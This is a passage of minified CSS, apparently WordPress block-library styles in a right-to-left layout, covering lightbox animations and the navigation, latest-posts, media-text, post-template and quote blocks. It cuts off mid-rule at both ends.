turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}ol.wp-block-latest-comments{box-sizing:border-box;margin-right:0}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){line-height:1.1}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){line-height:1.8}.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){line-height:1.5}.wp-block-latest-comments .wp-block-latest-comments{padding-right:0}.wp-block-latest-comments__comment{list-style:none;margin-bottom:1em}.has-avatars .wp-block-latest-comments__comment{list-style:none;min-height:2.25em}.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{margin-right:3.25em}.wp-block-latest-comments__comment-excerpt p{font-size:.875em;margin:.36em 0 1.4em}.wp-block-latest-comments__comment-date{display:block;font-size:.75em}.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{border-radius:1.5em;display:block;float:right;height:2.5em;margin-left:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both;overflow-wrap:break-word}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap}.wp-block-latest-posts.is-grid li{margin:0 0 1.25em 1.25em;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-left:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-left:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-left:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-left:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-left:0}}:root :where(.wp-block-latest-posts.is-grid){padding:0}:root :where(.wp-block-latest-posts.wp-block-latest-posts__list){padding-right:0}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt,.wp-block-latest-posts__post-full-content{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}ol,ul{box-sizing:border-box}:root :where(.wp-block-list.has-background){padding:1.25em 2.375em}.wp-block-loginout{box-sizing:border-box}.wp-block-math{overflow-x:auto;overflow-y:hidden}.wp-block-media-text{box-sizing:border-box;direction:ltr;display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{align-self:start}.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{align-self:end}.wp-block-media-text>.wp-block-media-text__media{grid-column:1;grid-row:1;margin:0}.wp-block-media-text>.wp-block-media-text__content{direction:rtl;grid-column:2;grid-row:1;padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{grid-column:2;grid-row:1}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{grid-column:1;grid-row:1}.wp-block-media-text__media a{display:block}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media img{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;clip:rect(0,0,0,0);border:0}.wp-block-media-text.is-image-fill-element>.wp-block-media-text__media{height:100%;min-height:250px;position:relative}.wp-block-media-text.is-image-fill-element>.wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill-element>.wp-block-media-text__media img{height:100%;object-fit:cover;position:absolute;width:100%}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{grid-column:1;grid-row:2}}.wp-block-navigation{position:relative}.wp-block-navigation ul{margin-bottom:0;margin-right:0;margin-top:0;padding-right:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block;z-index:1}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-right:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{display:inline-block;stroke:currentColor;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation{--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;opacity:0;position:absolute;z-index:2}@media not (prefers-reduced-motion){.wp-block-navigation .has-child .wp-block-navigation__submenu-container{transition:opacity .1s linear}}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{height:0;overflow:hidden;visibility:hidden;width:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1;padding:.5em 1em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{margin-left:0;margin-right:auto}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{right:-1px;top:100%}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;left:100%;position:absolute;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-left:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(90deg)}}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{right:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:initial;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-align:right;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-submenu__toggle[aria-expanded=true]+.wp-block-navigation__submenu-icon>svg,.wp-block-navigation-submenu__toggle[aria-expanded=true]>svg{transform:rotate(-180deg)}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-left:.85em;padding-right:0}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-right:-.6em;pointer-events:none}.wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){padding:0}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:0;right:auto}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;right:auto}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid #00000026}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-right:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{background-color:inherit;display:flex;flex-direction:column}@media not (prefers-reduced-motion){.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards}}.wp-block-navigation__responsive-container.is-menu-open{overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-left),20rem) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem);z-index:100000}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:#0000!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{right:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:#0000;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{left:0;position:absolute;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}.link-ui-tools{outline:1px solid #f0f0f0;padding:8px}.link-ui-block-inserter{padding-top:8px}.link-ui-block-inserter__back{margin-right:8px;text-transform:uppercase}.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}.wp-block-page-list{box-sizing:border-box}.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:right;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em 0 0 .1em;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-right:.1em}p.has-drop-cap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}.wp-block-post-author{box-sizing:border-box;display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-left:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}.wp-block-post-author-biography{box-sizing:border-box}:where(.wp-block-post-comments-form input:not([type=submit])),:where(.wp-block-post-comments-form textarea){border:1px solid #949494;font-family:inherit;font-size:1em}:where(.wp-block-post-comments-form input:where(:not([type=submit]):not([type=checkbox]))),:where(.wp-block-post-comments-form textarea){padding:calc(.667em + 2px)}.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form :where(input[type=submit]){box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}.wp-block-post-comments-count{box-sizing:border-box}.wp-block-post-content{display:flow-root}.wp-block-post-comments-link,.wp-block-post-date{box-sizing:border-box}:where(.wp-block-post-excerpt){box-sizing:border-box;margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image :where(img){box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:initial}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}.wp-block-post-time-to-read,.wp-block-post-title{box-sizing:border-box}.wp-block-post-title{word-break:break-word}.wp-block-post-title :where(a){display:inline-block;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit}.wp-block-post-author-name{box-sizing:border-box}.wp-block-preformatted{box-sizing:border-box;white-space:pre-wrap}:where(.wp-block-preformatted.has-background){padding:1.25em 2.375em}.wp-block-pullquote{box-sizing:border-box;margin:0 0 1em;overflow-wrap:break-word;padding:4em 0;text-align:center}.wp-block-pullquote blockquote,.wp-block-pullquote p{color:inherit}.wp-block-pullquote blockquote{margin:0}.wp-block-pullquote p{margin-top:0}.wp-block-pullquote p:last-child{margin-bottom:0}.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{max-width:420px}.wp-block-pullquote cite,.wp-block-pullquote footer{position:relative}.wp-block-pullquote .has-text-color a{color:inherit}.wp-block-pullquote.has-text-align-left blockquote{text-align:right}.wp-block-pullquote.has-text-align-right blockquote{text-align:left}.wp-block-pullquote.has-text-align-center blockquote{text-align:center}.wp-block-pullquote.is-style-solid-color{border:none}.wp-block-pullquote.is-style-solid-color blockquote{margin-left:auto;margin-right:auto;max-width:60%}.wp-block-pullquote.is-style-solid-color blockquote p{font-size:2em;margin-bottom:0;margin-top:0}.wp-block-pullquote.is-style-solid-color blockquote cite{font-style:normal;text-transform:none}.wp-block-pullquote :where(cite){color:inherit;display:block}.wp-block-post-template{box-sizing:border-box;list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{float:left;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{float:right;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{margin-inline-end:auto;margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-query-pagination.aligncenter{justify-content:center}.wp-block-query-title,.wp-block-query-total,.wp-block-quote{box-sizing:border-box}.wp-block-quote{overflow-wrap:break-word}.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){margin-bottom:1em;padding:0 1em}.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) 